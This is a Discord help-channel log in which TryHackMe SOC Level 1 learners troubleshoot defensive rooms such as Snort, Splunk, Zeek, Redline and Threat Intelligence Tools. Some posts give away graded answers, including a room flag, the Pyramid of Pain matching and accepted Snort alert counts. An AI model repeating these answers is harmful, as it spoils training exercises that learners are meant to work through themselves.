#soc-level-1-path

in the "Threat Intelligence Tools" room, is saving the malicious email attachment in the TryHckMe VM, getting the the SHA256 sum with the command line tool, then removing the file a safe way to get the SHA256 hash to search on Talos? The VM isn't connected to the internet and it's basically just a sandbox, no? Even so, is there a safer way to get the hash?

It just feels really sketchy to save something you know is malware, even if it's in a sandbox and you don't open it. Maybe that's just a feeling you have to get accostomed to when learning blue team stuff? 😅

Hey there. I am currently doing the Kabana room. Looks like the answers to these questions have not been updated . It’s only accepting old answers despite the fact that vpn-connection is showing diff data and based on that , it’s not accepting those answers.

Hello @timid dew , Can you please also mention the room link, and the screenshot or evidence for us to replicate and figure out the issue and sort it. Thanks.

Gave +1 Rep to @timid dew (current: #1967 - 1)

Trying to do snort right now - the page itself is written as there would be no other network traffic until you start the script, but there's a bunch and it makes it a bit difficult to discern the traffic that supposedly comes from the script and check how the changes in use affect it
Is that intentional/unavoidable?

what is a wireshark command that is not equel to tcp port 80

ive tried != !== not working

not tcp.port == 80

Heya. Can anyone recommend some Modules or Rooms where I can learn more about firewalls from a blue teaming perspective? Like how to set them up etc?

Hello Fellas, can someone help me access YARA LOKI?

Hi everyone, I'm doing the soc 1 learning path, but I'm interested in the 'Cyber Threat Intelligence' and 'Digital Forensics and Incident Response' modules. Should I follow the path as it is in THM or can I skip to those modules? I want to practice in Tryhackme because my college courses on these topics are mostly theoretical.

You can choose to do whichever modules you want. You don't have to follow any of the learning paths and can create your own bespoke path if desired.

Hi Turon, did you get an answer yet?

can anyone help me with this question I can not find the answer I even check the writeups but i think the room updated because in the writeups the questions are different

ca2dc5a3f94c4f19334cc8b68f256259 This is the md5 hash of redline

Room name : Intro to malware Analysis

What question are you having an issue with?

oh i just figured it out thanks

Can anyone tell me what font is used in Brim, in the Brim room?

hey guys.. i am currently training to be a Soc-analyst using the thm soc 1 pathway

Hello guys, I am on the Threat Intelligence Tools Room and I want to download the 3 .eml files used for the task so that I can use phistool on my machine and analyze them. The problem is, I don't have the option to download those 3 .eml files. I think I am missing something obvious but from what I found on internet the room was created to self download the files on the private machine.

You're not supposed to download them and use them on your host machine, that's why there is no internet connection on the virtual machine.

you need to use Thunderbird to open the E-mails.

Thank you @primal igloo, I saw from screenshots that before was available as a button (Download Task FIles), that was very cool because it permitted people to self analyse the file with whatever tool they wanted. Why is this no more a possibilty? I mean even just for curiosity would have been cool to analyse the emls

Gave +1 Rep to @primal igloo (current: #2 - 1938)

These files could be malicious, so it's best to leave them on the the sandboxed enviorment.

okayy, thank you @primal igloo🔥

Gave +1 Rep to @primal igloo (current: #2 - 1939)

https://tryhackme.com/room/windowslocalpersistence task2 ; don t get it why i don t have the same outcome as a room...? thanks

The one shown on the left is the Attackbox which runs on ubuntu while you are trying to run it on your Windows target (via cmd).

so you recommend me to get ubuntu? what about if i want to do with THM room, i cannot?

You could do Ubuntu, Kali or even Parrot. Whichever is convenient to you at the moment.

why it doesnt work ? what is the other optionhttps://tryhackme.com/room/windowslocalpersistence. task2

Haven't done this room yet, but does thmuser1 supposedly have the access needed to extract SAM and SYSTEM files?

i manage to restart the machine but then the python script doesnt work

Hey guys, I am having issues with Splunk. Search results are not populating https://tryhackme.com/room/splunk201?path=undefined

Did you wait around 15 minutes for the machine to fully spin up (including the services)?

Yes, I have been sitting here for the past 2hrs waiting for the results to pop up.

Will restart both machines

Still nothing. Does anyone have a fix to this??

Maybe try posting this in #room-bugs?

As far as I remember, I coped with it, by sending the generated traffic to eth1 (script for its generation sends traffic to eth0), then set snort to read from eth1.

guys im on task 5 and for the questions its asking me to use thunderbird to analyse a email. When i open thunderbird using the attached vm its asking me to make a account. i dont want to make a account, and plus making a account on the attached vm would be useless because it resets evertime. what should i do?

Just hit cancel.

yeah thanks. watched a video and you dont even need a account to use thunderbird

Gave +1 Rep to @primal igloo (current: #2 - 1973)

Nah, it's only if you want to hook your E-mail so you can use that client for all your E-mails. instead of logging in to the website ie Outlook,

ah gotchu

How to fix this issue? Attackbox is glitching when i try to launch the room inside of it. I need to drop the downloaded file to the splunk add data and I cant do that if I dont download the file first on the launched room because when I click the download files it saves on my personal pc and i cant drop the file from my personal pc to attackbox.

How do I drop the file to the attackbox from my personal pc? Opening the room inside attackbox causes a glitch.

@pure crow @hazy surge have you completed splunk201 room

Can you help me with task 9 q2

I was able to complete splunk basics. There was a folder inside that you can access where the downloaded file is.

Im not done yet on splunk201 brother. Currently doing it. Once im done ill assist you

i need help, im on a premium for this month. I connect the machine via VPN (sudo open VPN). It is connected but when i try to put the IP (site) on the browser of my own machine it shows nothing. but when i access it via split screen the site will show. how to solve this?

for referrence i am doing this "Task 18 [Day 12] Defence in depth Sleighing Threats, One Layer at a Time" of Advent of Cyber 2023.

i can only view the site via THM attack box and not on my machine even i am connected to VPN

VPN Server Name

EU-VIP-2
Internal Virtual IP Address

10.14.72.187
Server status

Online
Connection

Connected

Did you SSH in to the machine as instructed?

Yes

Hi Help me
I'm sure about answer but webapp thm say WRONG

room: Benign
Q: What is the URL that the infected host connected to?
A: https://controlc.com/548ab556

but say not

somebody can help

pleassseee🥲

The link was expired so it was changed in the logs a few days ago. I have confirmed, the link within the logs that you will find works perfectly fine as of today. Please check again.

Folks don't usually give out answers directly as it defeats the purpose of the platform.

My friend has an interview coming up in the SOC field. The position mostly focuses on creating firewall rules, reverse engineering malware, and network security. He wants to know what rooms in THM would help him prepare for open ended questions/technical ones also.

Any advice would be appreciated

Paths SOC L1 L2 will help so much

to complete these paths you need at least 1 month

Depend of you Intensitivity. I did in 2 weeks

and I could build my solid base from the each it

You did both in 2 weeks?

not, SOC L1 in 2 weks

Then both will require at least a month

maybe, or more time because SOC L2 has more dificult rooms than SOC L1

as I said, depend of intensity (time per day), willing to learn, how quick you get each domain

just finished 2 requisite path to this :), its somewhat fun and interesting

Hello all, I am currently in the Threat Intel Tools rooms and trying to do the phishing emails part. I am not entirely sure how to access the emails from the AttackBox to analyze them with PhishTool

Guys, whats correct answear in room Benign - task 2 - last question ?

cuz this is not working (https://controlc.com/548ab556)

That's because its wrong.

shiat 😄

whats the correct answer ? any hunt pls ?

hint*

What are you using to search?

nvm i got it finally ! 😄

Hello everyone, currently trying to finish up the Redline room but its just taking foreverrr for Redline to scan and import the analysis. This will be my 4th day or so trying to come back and finish it up because it takes so long to scan and import. I got an error not long ago for disk space being low as well when trying to import the analysis into Redline. Is it normally supposed to take an hour+ for it to scan? Then it takes 30 min+ to import the case. Thinking support may need to add more resources or something.

Hi

In snort task 9 it asks for me to create a snort rule and I do exactly that but it says “snort rule is missing port number” I literally don’t have a port number. I have a ip I’d but no port number. Anyone know why?

hello guys

i need helpo

i am working on the zeek room and the attack machine is so slow

i have tried to scp the task files to my loacl machine so i can complete the task but its not working. is there any other way to get the task files so i can use my local machine to complete the task . help guys

let me check the room and try to give you help

I don’t know the exact room you’re going through but it may want you to find the port that a particular service is using. You could also use an arbitrary port number if it just wants you to create the rule for any port.

I’m not certain that’s the answer and I can’t check atm but it’s something to look into

Hm

You may be right

I’ll try when I get a chance

Thanks

Hope it helps!

i also did check the said question. but i didnt see. what is the exact question. also you may need to investigate the pcap file to identify the port in question

Hej guys, i have found SOC 1 MISP module Task 5 Answer 1 "error" as I have found the idd associated with PupyRat yet the filed does not accept the value, do you have any idea what might have gone wrong?

Hello, I am in the Yara room on task 8-9 there are several tasks concerning a file called index.php, Loki will run on it just fine but when I look to run any other commands on it like strings in task 9 the machine tells me that the file doesnt exist. is there something I am missing? index.php does show up on the "ls" command to find the file

check the spelling you are using.

hint: ||some of the characters are numbers||

I’ll check it out again later thanks!

It was bugged somehow, had to restart the attack box and the task machine

im in the exact same spot and im lost

Threat Intelligence Tools Task 5 PhishTool. I'm a little annoyed that I can't get out to the internet from the AttackBox to analyze the email with PhishTool imma read the raw file for the answers anyway but im still mad about it

You need to use Thunderbird.

This is standard practice for sandboxed environments for potential harmful files.

thank you. i read the email in vim to find it but bc of your message i went back and figured out how to find it in thunderbird too so thank you!

I'm just yapping bc after reading all the info about PhishTool i assumed i would be using PhishTool too

Gave +1 Rep to @primal igloo (current: #2 - 2079)

Hey all,
I'm in Snort Challenge - The Basics ( Task-2 ) I need to investigate log files but when I run ls, I do not see any.

Help me please!

On that file have a pcap file do analyze to that file

Hi all,
Did anyone doing the Redline room in this path faced an issue of running out of storage on the disk while waiting for the program to create analysis out of the session file? I did everything as per guide in the room

My folder for the session was in Public Documents and it had around 10GB of data after the script was done and after I got that error from Redline.

I dont remember exactly, but I do remember that I ran out of space. I think there were 2 scans (1 made by me and 1 made by THM) and I deleted the one made by me and continued with the one provided by them.

Mmm,. okay, I'll give it a try.. thanks for the reply

Gave +1 Rep to @gentle arch (current: #2035 - 1)

Hello all. Why my snort keeps running “warning: no preprocessors configured for police 0”. I’m in the snort module exercise 6

Can you please lemme know in brief

It must have something to do with the rules file or path to the rules file. Can you provide a screenshot with more details and commands you ran?

The command that you need to run goes something like 'sudo snort - A full -r mx-3.pcap -c local.rules'.. this will tell snort to generate log files from the given pcap file thats in the directory for that task and you will use the same logic for all other tasks that you face.. Good luck

Hey just letting you know something seems to be amiss with the snortchallenges1 task 2 set up. When I interrogate the pcap setting the number of packets to 65 I get the following as the last packet output (should be packet 65, no?):

However when I enter the values listed for the questions relating to packet 65, I'm being told the answers are incorrect

As a sanity check I visited this write up https://medium.com/@huglertomgaw/snort-challenge-the-basics-tryhackme-225c332b50ac where I see completely different values for packet 65 but they are accepted as correct.

Command I'm using is nothing fancy: sudo snort -r mx-3.pcap -n 65

Either somethings borked somewhere, or I'm doing something wrong, and hey I've been known to make a mistake or two so it could be possible, but from what I understand from the snort rooms, my command should expose packet 65 as the last packet output from the snort commmand.

Also, I chose packet 65 as an example, there are other questions for which the details in the packets I arrive at are not accepted as the correct answer.

How many alerts are you getting

Hey all!
I'm trying to get the signature logs. I did create signature rule as well for the task-5 to find the source IP. When I do ls, I do not see the signature.log files. Any help.

https://tryhackme.com/room/zeekbro

NVM! I found the mistake. I should include signature as well in the zeek command
zeek -C -r http.pcap -s http-password.sig

Well that was another oddity, because I did the rule wrong initially and only filtered for outbound connections to port 80, I saw 164 alerts put it in as my answer and it was accepted, then I fixed the rule and re-ran snort and received the expected number of alerts; 328. I'm not sure if the room would have accepted that answer since I had already entered the outbound only figure and it was accepted.

I am still not understanding how to analyse the emails in the Threat Intelligence room for Scenario 1 and 2. How am I supposed to check the attachments for the emails if I cant access internet?

Have you tried copying the file in your local machine and install Thunderbird (to open the email)?

No? Why would I do that?

If the machine doesn't have a connection, it's because the files are not supposed to move from it.

ie phishing emails etc

Just saw a video where someone just started up a web server on that machine and downloaded the files to the attack box to be able to upload. I think I'm just going to follow that unless someone knows a better way

I'm facing the problem in hash value. I mean
question: Analyse the report associated with the hash "b8ef959a9176aef07fdca8705254a163b50b49a17217a4ff0107487f59d4a35d" here. What is the filename of the sample?

I'm not getting what it is asking to do??

if anyone go with this pls explain? what exactly it is askin'

Virustotal > DETAILS > Names.

Ahh...thanks
got it

pyramid of pain > domain name > requesting to provide the first suspicious URL request I'm seeing in the report.
can anyone help me like where exactly I found the url request??

@primal igloo bro can you pls help?? if you take out come time it will be very greatfull for me 🙂

have a look at these tabs

I got it earlier I don't know how I can take so much time int this small stufff
btw thankyou

Hello i'm in the BRIM room and i don't know if is it normal for the "Example Query" column not to display examples? Only when I highlight them

Noticed this too, I imagine it's unintentional and a bug

Also noticed what I believe to be an incorrect answer in the wiresharktrafficanalysis (3rd of the wireshark trio). In task2 a question is asked like so: "Which scan type is used to scan the TCP port 80?" So I follow the relevant stream and got the following result:

According to notes (and my acquired knowledge) that's a TCP SYN Scan:

But the expected answer is TCP Connect, which is incorrect:

Why i cannot upload a pic here?

security operations practical exam. How do i know the portal number, just guess. source IP and destination IP numbers are clear. Thanks

You need to verify

@fast girder

for example

Hello everyone I am looking for advice: I am currently doing the SOC1 course but at the same time I am studying for the COMPTIA Security+ 701 exam and I feel somewhat overwhelm due to the fact that I am trying to build my skills but is Building the Skills the best option then studying for an exam? If this makes sense.

I’m in kind of the same situation, have you spent time familiarizing yourself with other parts of the exam?

I have

Maybe Im overthinking the process

In my opinion, after just having completed my SEC+ last week, and jumping right into the SOC 1 Pathway, I would recommend doing your SEC+ first. I would say the most obvious diff is that one is concept and processes and the other are the tools themselves

I would think logically, learning about processes and their overall roles in the Cybersecurity mindset, then learning the actual tools that be effectively used in them

Just IMO

Thanks for the advice.

Gave +1 Rep to @worn verge (current: #2054 - 1)

Hello, I'm having problems starting Yara Task 8. Is anyone having problems starting Yara? I tried several combinations on how to start it and none of what I tried seem to work.

#soc-level-1-path message

Ok thank you @tepid hill

Gave +1 Rep to @tepid hill (current: #14 - 496)

anyone elses grim whois lookup not working

Hey all!

Im currently working through the SOC Analyst Level 1 path, and have come across an issue the "Snort" Room machine.

I had done task 4 fine, closed my browser and came back to it later in the day, now no matter what flags I add when running Snort, or wether I run it with sudo or not, i'm getting pages and pages of errors similar to the below:

***"WARNING: No preprocessors configured for policy 0.
04/11-13:52:20.828796 10.100.1.202:49284 -> 10.10.137.124:80
TCP TTL:64 TOS:0x0 ID:2911 IpLen:20 DgmLen:84 DF
AP Seq: 0x700B6427 Ack: 0xAFB00F0C Win: 0x183F TcpLen: 32
TCP Options (3) => NOP NOP TS: 1901165899 3098964094
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

(snort_decoder) WARNING: IP dgm len > captured len
WARNING: No preprocessors configured for policy 0.
WARNING: No preprocessors configured for policy 0.
04/11-13:52:20.829789 10.100.1.202:49284 -> 10.10.137.124:80
TCP TTL:64 TOS:0x0 ID:2912 IpLen:20 DgmLen:52 DF
A* Seq: 0x700B6447 Ack: 0xAFB0525A Win: 0x17EF TcpLen: 32
TCP Options (3) => NOP NOP TS: 1901165900 3098964103
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+"***

Am I doing something silly/missing something obvious, or is there a problem with the machine?

Thanks! 😄

Oh those aren’t actually errors. That’s snort actively scanning. If you do ctrl + shift + c it should end the scanning process and give you a snort log.

Basically the longer you let it scan the more network traffic is gonna be scanned

Thank you, I thought that might be the case! It was throwing me off as my results didn’t look like the images in the room! Will have another crack tomorrow and smash the room out 💪🏻

Gave +1 Rep to @floral otter (current: #113 - 55)

You’re welcome. If you have any problems feel free to ping me

Good night

I have a problem

i 'm studying SOC level 1 - SNORT

the machine has a script "traffic-generator.sh", But when you run it, it returns this error:

Error constructing proxy for org.gnome.Terminal:/org/gnome/Terminal/Factory0: Error calling StartServiceByName for org.gnome.Terminal: Timeout was reached

Do you know how to solve it or if I can talk to someone about it?

are you runnnh the traffic generator script right

is this right?

whats right

Error constructing proxy for org.gnome.Terminal:/org/gnome/Terminal/Factory0: Error calling StartServiceByName for org.gnome.Terminal: Timeout was reached

I can't generate traffic

Going through wireshark:packet operations room, can someone pls explain why the display filter for the last question in task 5 would be dns.qry.type == 1 && dns.flags.response == 1 and not dns.qry.type == 1 when the question says "What is the number of "type A DNS Queries"?

Wait, forget about that, now im also confused.

I believe one of the queries counts requests AND responses and the other only counts responses

There should be roughly double the count when counting both queries and responses

(correct_answer * 2) != correct_answer

Just finished level-1 path woot woot!

Hello i'm on the Velociraptor rooms and I don't understand something.
Why with the VQL Drilldown, the graph appaers like the picture. The data going back in time ? It's a display bug ?

hey anyone here who can help out task9 Pyramid Of Pain plz dm

send the doubt

Hello guys, Redline room is taking forever. There is anyway to take the session and run it on my computer ?

Hey Guys, maybe for the most of you guys this question will be "laughable" but im a really beginner in this world and im doing the SOC Level 1 - Pryamid of Pain: Task 9 where i have to match sentences to the pyramid of pain. In my (beginner) logic how i matched the sentences to the pyramid is the way to go but its sadly wrong and i would need some help with this task.
May there is some1 who can help me with?
Thanks all

yeah it is really slow. Then when it does create the analysis files I get an error loading them. Have tried a few VM restarts. Have moved on for now. Will come back at the end of the path and try again.

Had something similar. Can't explain why but just so you know its not you.

Velociraptor Room https://tryhackme.com/r/room/velociraptorhp
Task 4 - I don't see the KapeFiles Artifacts to select for new collection

I have completed the rest of the room but unable to get my instance to match the screenshots or steps of Task 4. The task calls for creating a New Collection based on the "Windows.KapeFiles.Targets" Artifacts and shows 3 search returns that have Windows in the results. I don't have any windows or kape results in my search (screenshot attached).
Have tried 4 different VM restarts over 2 days.
Not sure where to take that one next.

Ideas?

nooco — heute um 18:26 Uhr @#room-help
Hey!

First of all, thank you for creating the room:
Snort Challenge - The Basics.

I have a difficulty with task 2 - question 1 about "Write rule to detect all 80 TCP port traffic.
Could it be that TryHackMe does not accept the correct answer or is it really wrong 🙂 ?

Greetings from Germany

For the task 9 of the pyramid of pain. The flag is ||THM{PYRAMIDS_COMPLETE}||

I've just tried it again and got the THM 'right' answer. If you want to share your snort rule we can compare for any differences.

Some people don't want the answer, so please place the answer between || to hide it

Don't get what you mean?

You sploil the answer hide that so people who want to learn not show the leak answer

Okay.

|| HIDE THE ANSWER USING DOUBLE PIPE ||

Done that. Thank you

Gave +1 Rep to @muted flame (current: #193 - 30)

Thanks mickc. I helped me out by myself and found a post from nelbert:

nelbert — 15.04.2024 17:05
Update: dug around and looked, and it seems that using the bidirectional operator (<>) generates two alerts for packets depending on how you write the rules. It looks like ||328|| was previously accepted by THM as the correct answer but this must have been updated. ||Changing the rules to use -> instead of <> generates half the alerts (164) which is now accepted as the correct answer.||

Gave +1 Rep to @blazing aurora (current: #1372 - 2)

Hi !
the snort room is easy if you understand how to write rules !
If you have some difficulties, ping me and I help you 😉

Hi! Can someone explain why my answer: 328 on how many packets is captured on the Snort Challenge - task 2 is wrong? (Resolved)

Hi guys, I'm struggling with Task 2- Writing IDS Rules(HTTP) in SOC Level 1 Snort Challenge - The Basics. First question: "What is the number of detected packets?", I got 328 but the answer is incorrect, i googled it and it seems the other get also the 328, can someone help me about that? (Resolved)

Hey, i actually solved it. Look carefully for TCP packets and not the total packets

actually it doesnt matter whether it is ssd or hdd

try it out:)

guys, god night

guys
help me please
Can anyone help me with task 9 of the pain pyramid?
I'm not able to do the 9 because I'm Brazilian and I don't speak much English
The attacker has utilised these to accomplish their objective.

The attackers plans and objectives.

These signatures can be used to attribute payloads and artefacts to an actor.

An attacker has purchased this and used it in a typo-squatting campaign.

These addresses can be used to identify the infrastructure an attacker is using for their campaign.

These artefacts can present themselves as C2 traffic for example.

1 - TTP
2 - Tools
3 - Network
4 - Domain Names
5 - IP addresses
6 - Hash values
Can anyone please answer me?

wow, the task was different when i solved it

TTPs - Obviously plans and objectives. The name Tactics, Techniques and Procedures tells for itself.

Tools - They are utilized to accomplish the objective. Different tools allow an adversary different opportunities. But the common thing of them is exploiting and gaining access.

Network Artifacts - These are the artifacts over the network such as user-agent string, C2 info, or URI patterns. If we detect them, we can block them, which will give a rough time for an adversary.

The rest try to figure out urself:)

thanks bro!!!

hello

whats the best tool for that ?

I've heard about Clonezilla but u can ask someone more experienced than me

I prefer FTK Imager Lite if you need to take a full disk image on a live system. If you need a full disk image of an offline system I would recommend using a boot disk like Paladin or CAINE assuming you arent pulling the internal hard drive. Otherwise, if you don't need a full disk image and just want to get the artifacts you need for analysis, I would recommend using KAPE which has various modules to collect specific artifacts and process the data using Eric Zimmerman's EZ tools.

Hey everyone I am working the Snort Challenge - The Basics in the SOC 1 path. How do I get the snort log to display the msg from the rule. No matter how I'm reading the snort.logs I never see the msg "TCP request detected" (or whatever the msg might be) I am using "sudo snort -r snort.log.2714856" to read them. Are there other ways to better read these?

If that's all you're typing, you're forgetting to apply the custom rule that you make with -c snort.local (and also put -A console if you only want to just output results to console, or -l . if you want to save the report to your current directory)

I just finished the three snort rooms and just wanted to say I actually enjoyed them 🙂 they're pretty engaging and hands on, it was fun

-TTP: The attackers plans and objectives.
-TOOLS: The attacker has utilised these to accomplish their objective.
-NETWORK: These artefacts can present themselves as C2 traffic for example.
-DOMAIN NAMES: An attacker has purchased this and used it in a typo-squatting campaign.
-IP ADDRESSES: These addresses can be used to identify the infrastructure an attacker is using for their campaign.
-HASH VALUES: These signatures can be used to attribute payloads and artefacts to an actor.

Come here when you are tired of researching, analyzing and thinking.

Snort Challenge - The Basics: - Task 2 Question 1:

I've made the correct rule for detecting packets incoming and outgoing on port 80, have run snort and generated a log file, and have a result. I've double checked the result against multiple walkthroughs as I was sure I am doing it right, and they agree with my awnser, yet THM is still saying that the awnser is incorrect?

Any advice?

Thanks nooco, this fixed it!

Can anyone confirm that difference between -> and <>?

I assume -> is "server to client" and <> is both directions?

Does this double the amount of detected packets as it's detecting both directions of data during a TCP handshake?

Gave +1 Rep to @small arch (current: #2073 - 1)

definitely enjoyed doing it

another one sticks in the tar pit... yeah the correct answer can be seen in the command output or you need to rewrite your rules in another way

It seems that when I run snort with the same rules file it's throwing up different results each time, is this the correct behaviour?

Onto the Task 3 now, and yeah, I can run snort twice straight after one another and i'm getting a different number of "Total" packets each time?

well then your rule is somehow funky

Hello!

I am in the Threat Intelligence Tools room, currently on Task #5 "PhishTool", and the questions indicate that I should use the PhishTool website which the task had me create an account with to solve the problems... but the VM isn't connected to the internet. What's the deal with that? How am I expected to analyze the file with no further instructions and no internet access on the VM?

I always feel like there a things missing from these TryHackMe rooms but maybe I'm just not used to how things work on this platform. Just seems odd that I should always have to dig into a Medium article/writeup to get the information I need. I know that prompts investigation but it seems like I'm constantly digging off site for answers and that not enough pointers are provided. Any help is appreciated.

I'm going to crosspost in #room-help so feel free to flag me or whatever I just don't know where to seek help for this stuff because the TryHackMe website just asks me to go on Discord.

You don't need to use phishtool at all, it's an.example of what you could use, however as you're working with potentially dangerous files, you're external networknis cut to help protect you and the network.

The task material state to use Thunderbird Mail for the E-mails.

Has anyone else had a problem with the Sysmon VM not working?

Hello @vital bluff I just checked - the VM is up and running within 3 minutes and working just fine - Can you check again and let me know if the issue persists on your end?

At first I tried restarting the machine a couple of times, waiting the recommended 5 mins to luck and I gave up. A couple of hours later I tried again and it worked as a charm!

Hello everyone. I got a question, is there a big difference between siem and edr. Especially if we are talking about Splunk and Wazuh. Both collect logs that can be analyzed in both instances. Can anyone clear this for me?

https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-endpoint-detection-and-response/edr-vs-siem/

https://www.sentinelone.com/blog/understanding-the-difference-between-edr-siem-soar-and-xdr/?utm_medium=paid-display&utm_source=gdn-paid&utm_campaign=apj-en-g-pmax-anz-nnew&utm_term=&utm_campaignid=20927122695&ad_id=&gad_source=1&gclid=CjwKCAjw0YGyBhByEiwAQmBEWsXIWGRah6QQU-w8v7sGr_LdmK8CsPjyacbsAhBslEjR6RIKaYWSlBoC4-8QAvD_BwE

appreciate it!

I wanted to use my own words to differentiate it, but then again, these experts can do it that much better.

Does anyone know if there is an issue in the SNORET Writing IDS Rules (HTTP) i have run my rules, and it shows 328 packets, input that in the answer field and it comes up incorrect. I have reluctantly looked thru the writeups and the same anser im typing is what is getting credit in the writeups.

There is no issue with the room and your answer is in fact wrong.

If you compare this (from https://tryhackme.com/r/room/snort) to the rules you use, what are your rules actually matching? (edit: given that this is a week old, probably clear by now)

I'm having the same problem

Nvm

I got correct one

I changed the rules

Change first rule direction to source to destination and second one to bidirectional

Btw where to choose roles ? @royal basin

I was confused because those online answers were wrong too

That might accidentally work out here but it still makes no sense to use the bidirectional operator when the rules themselves already match both directions.

so i have to use -> for 2nd one too?

That is because the room used to be wrong and was then corrected. The walk-throughs were never updated. But heads up: The room author only corrected task 2 question 1. For the rest of the questions and task 3 (ftp afair) you better still follow the walk-throughs because if you do it right, your answers won't be accepted.

?

It said there is no <- sign in snort

So that's why I used bi directional

@royal basin btw where is the role channel? I can't find it

You verify for roles.

Thanks

Hey I'm doing the same tasks we can both solve together if you like

@royal basin can I ssh into snort rooms? My wifi is trash and browser vm is slow as fk

I actually figured it out based off the help I received. I finally realized what I had done wrong. The snort stuff was wicked fun

I figured it out and feel dumb for asking. Thank you @royal basin

Gave +1 Rep to @royal basin (current: #269 - 19)

You completed the snort challenge basics room?

Hi, isn't the answer should be ||2||?
Which ControlSet contains the last known good configuration?
||and ControlSet002 will be the last known good configuration.||

hey is there a bug in Threat Intelligence Tools under Cisco Talos Intelligence with Whois search

What’s the bug?

Does it give you ssh credentials?

If so then yes

no

Then you probably can’t ssh into it

you can no longer do the whois search

Which task?

Task 6

2nd question

it works on other websites like: https://www.whois.com/whois/204.93.183.11

I'll let staff know.

but for some reason not on talos

I like https://whois.domaintools.com

ah yes talos

kinda messy to find some results depending on which talos page you are on

it has changed a bit comparing to the photos form task

hey

anyone good at command line searching event logs? i need a hand to get to the answers for Windows Events Log room

this stuff has way toooooo many options

so the question goes like this
'A Log clear event was recorded. What is the 'Event Record ID'?'

can't seem to find my way in searching for it correctly

Either the windows built in event viewer (or whatever is the exact name) or you can try Zimmerman's suit of tools that include one to export windows event logs to text files.

well the goal of this room is to find what your looking for with Get-WinEvent

That's another option

Sorry I missed your "command line"

Get-WinEvent -path .\Desktop\merged.evtx | Where-Object{$_.Message -Like "Log clear"}

This does just nothing and the machine is like hanging

until i CTRL-C

? no answer?

Still an open question? The answer is in the room text if you read it carefully.

HEY in rooms benign i cant connect to splunk
http://10.10.126.111:8000/ i try this from the attack box but unable to connect.. what am i doing wrong?

found wht- didnt need the 8000

Splunk: Setting up a SOC Lab
task 3
I type the gollowing into the browser; http://coffely:8000/
nothing happens, I have spent the last 3hours on this room and nothing work, is there a customer service number for try hack me?

Incident handling with Splunk - I'm probably being dense, but i've started the machine, started the attackbox, connected to the machines IP and the Splunk dashboard is showing, but there doesn't seem to be any data in Splunk? I've searched through all the Rooms folders and can't see anything relevant either, any help would be greatly appreciated 🙂

Ignore me, just needed to search for "index=botsv1 imreallynotbatman.com"

As expected, I am dumb 😂

To anyone with a voucher and will love to give it away , I am kindly asking for it, so I could continue my learning for the SOC t1 please

unrelated but where did you gain the sec+ & cysa role?

This task requires us to follow the steps and install Splunk and then we can access it via the link http://coffely:8000/. Are you sure, you have followed all the steps correctly? Can you double check and respond.

is there an issue with Snort Challenge - The Basics Task 2 and task 3?. The ip addresses clearly show but what it is but the input is not taking it. Question 2 ,3 and 4, And for task 3 the total amount is not being accepted... found out it was worded incorrectly

for the task 5 in the soc1 threat intelligence tools room do i need to set up tunderberd on my system and do ssh to get the emails or just make an acount and use the split screen?

No, when you open thunderbird just hit cancel.

ok and now?

Open the emails?

requires a account setup

i managed to open it by doublecliking the email itself

Morning all!

In the Redline Room, I'm struggling to get the analysis stage to work properly.

I have created the Redline script exactly how task 2 details, run the script as administrator, waited for it to finish.

When opening the "AnalysisSession1.mans," the analysis does not have any analysis data.

The only things in the left pane are, Timeline, Tags and Comments and Aquisition History.

I've restarted the machine multiple times, and have tried across the last few days, and get the same result every time.

Anyone aware of something I might be doing wrong or could this be some kind of bug?

The Analsis folder I create is over 7GB, so it would indicate that something is there?

Got hit by loki requesting root for a full analysis is that normal?

Can you link the room?

https://tryhackme.com/r/room/yara

task 8

the zeek room was kind of a beast but i enjoyed that

Hello everyone,

I am currently taking the "Incident Handling with Splunk" course and I am stuck on the part where I need to detect the correct password for Joomla administration. I used this query:

index=botsv1 sourcetype=stream:http dest_ip="192.168.250.70" http_method=POST uri="/joomla/administrator/index.php" form_data=*username*passwd*
| table _time uri src_ip dest_ip form_data

This gives me the passwords that the attacker used to attempt to access Joomla. Can you please help me? Thank you in advance.

I started this path a month ago and I finished it there was so much time spent boggling my mind but like that's how I learn. I just wanted to say for anyone on the fence about THM it is insanely helpful, for me it gave me a new side of cybersecurity I didn't know about and I found a real passion for threat intel/malware analysis/reverse engineering mostly from getting on the cyber side of youtube but if it weren't for THM I wouldn't have known where to start and would've definitely been a much more confusing process

Hi.. want to ask... the answer in attackbox.. but consider as incorrect? and i did double check with some writeup and walkthrough too. i done it correctly. but why its wrong? hahaha

anyone have this issue?

what command / rulesets did you use

the ip should start with 216.

alert tcp any any <> any 80 (msg: “found”; sid: 100001; rev:1;)
alert tcp any 80 <> any any (msg: ”found”; sid: 100002; rev:1;)

sudo snort -c local.rules -r mx-3.pcap -A full -l .

I am having this same issue, I even looked at about 5 write ups and they all used the same rules: alert TCP any 80 <> any any (msg: “Task 2”; sid: 1000001; rev: 1;)
alert TCP any any <> any 80 (msg: “Task 2”; sid: 1000002; rev: 1;) and comands: snort -c local.rules -A full -l . -r mx-3.pcap, snort -r snort.log.1687945949 -n 65.

Good evening everyone, I hope you're all well. I have a problem in the ItsyBitsy room, when I launch elastic, I'm not asked for a login or password and I access the empty elastic with no data to process. Has this ever happened to you? Have I missed something? Thanks in advance!

Try changing Elastic date/time to get the data.

ok.. basically.. i solve it myself... lol.....

it just need a single line rule.. walk-through is 2 line rules.. which i dont understand why 2.

but just use single rule.. + given msg "<as in bold text">, then you good to find out the answer

its funny.. is that.. after i post it here.. i found the answer by my ownself. hahahaha..

Ok i got it, i had to change date to 3 years ago 😂, thanks for your help guys

Yes, initially I had the same confusion then figured it out. 😁

Hey everyone
I had a question regarding " For Threat Intelligence Tools, Scenario 1" question 2 where it asks "From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..."
I had acquired the hash for both the email and the attachement and placed both of them into Talos File Reputation but none of the Detection Alias options start with an "H"

I would appreciate any help or guidance on where I should be looking or advise on any mistakes I am making

snort

Having the same issue also, not sure if you figured it out but I have reset the room 6 times and seems to be a bug.

Snort

Can anyone suggest me where not to waste much time (on silly things in some rooms) in the path ?

I am feeling like I am wasting my time on some room that I shouldn't.

which one ?

Where do you get certs that look like that lol

~~Also in Threat Intelligence Tools's Scenario 1, ~~
